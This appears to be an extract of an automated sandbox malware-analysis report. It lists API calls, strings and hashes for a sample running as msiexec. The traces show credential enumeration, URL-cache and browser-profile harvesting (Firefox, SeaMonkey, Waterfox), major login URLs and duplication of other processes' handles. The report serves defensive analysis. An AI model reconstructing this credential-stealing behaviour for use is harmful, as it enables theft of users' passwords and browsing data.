                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                    • API String ID: 2744995895-28296030
                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                    Control-flow Graph: graph data not present in this extraction.

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                    • memset.MSVCRT ref: 0040B756
                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                    • memset.MSVCRT ref: 0040B851
                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    • memset.MSVCRT ref: 0040BB53
                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                    • String ID: chp$v10
                                                                    • API String ID: 4290143792-2783969131
                                                                    • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                    • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                    Control-flow Graph: function 40e2ab-40e4af (memset, wcschr, memcpy, free); rendered graph, executed/not-executed legend and block-edge data not reproduced here.

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386

Control-flow Graph

• Entry block 4091b8 (graph not reproduced)
APIs
• memset.MSVCRT ref: 004091E2
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
• memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
• memcpy.MSVCRT(?,00000023,?), ref: 0040930C
• memcpy.MSVCRT(?,?,00000010), ref: 00409325
• memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
• memcpy.MSVCRT(?,00000015,?), ref: 00409357
• memcpy.MSVCRT(?,?,00000010), ref: 00409370
• memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
• memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
• memcpy.MSVCRT(?,00000023,?), ref: 00409462
• memcpy.MSVCRT(?,?,00000010), ref: 0040947E
• memcpy.MSVCRT(?,?,00000020), ref: 0040949A
• memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
• memcpy.MSVCRT(?,00000015,?), ref: 004094D0
• memcpy.MSVCRT(?,?,00000020), ref: 004094E8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898

Control-flow Graph

• Entry block 413f4f (graph not reproduced)
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382

Control-flow Graph

• Entry block 4466f4 (graph not reproduced)
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
• API String ID: 1157525455-1702587658

Control-flow Graph

• Entry block 40e175 (graph not reproduced)
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                    Control-flow Graph (image not included in this extract)

                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                    • API String ID: 2936932814-4196376884
                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                    Control-flow Graph (image not included in this extract; legend: Executed / Not Executed)
                                                                    • Function 0040BDB0, basic blocks 40bdb0 to 40bf6f: entry calls 00404363; subsequent blocks call CredEnumerateW, 0040B2CC, wcslen, wcsncmp, 0040BD5D, 00404423, memset, memcpy, _wcsnicmp, wcschr and LocalFree, with the exit path through 40bf63-40bf6f calling 0040440C
                                                                    APIs
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                    • memset.MSVCRT ref: 0040BE91
                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                    • String ID:
                                                                    • API String ID: 697348961-0
                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403CBF
                                                                    • memset.MSVCRT ref: 00403CD4
                                                                    • memset.MSVCRT ref: 00403CE9
                                                                    • memset.MSVCRT ref: 00403CFE
                                                                    • memset.MSVCRT ref: 00403D13
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403DDA
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                    • API String ID: 1829478387-11920434
                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403E50
                                                                    • memset.MSVCRT ref: 00403E65
                                                                    • memset.MSVCRT ref: 00403E7A
                                                                    • memset.MSVCRT ref: 00403E8F
                                                                    • memset.MSVCRT ref: 00403EA4
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403F6B
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                    • API String ID: 1829478387-2068335096
                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403FE1
                                                                    • memset.MSVCRT ref: 00403FF6
                                                                    • memset.MSVCRT ref: 0040400B
                                                                    • memset.MSVCRT ref: 00404020
                                                                    • memset.MSVCRT ref: 00404035
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 004040FC
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                    • API String ID: 1829478387-3369679110
                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 3510742995-2641926074
                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                    APIs
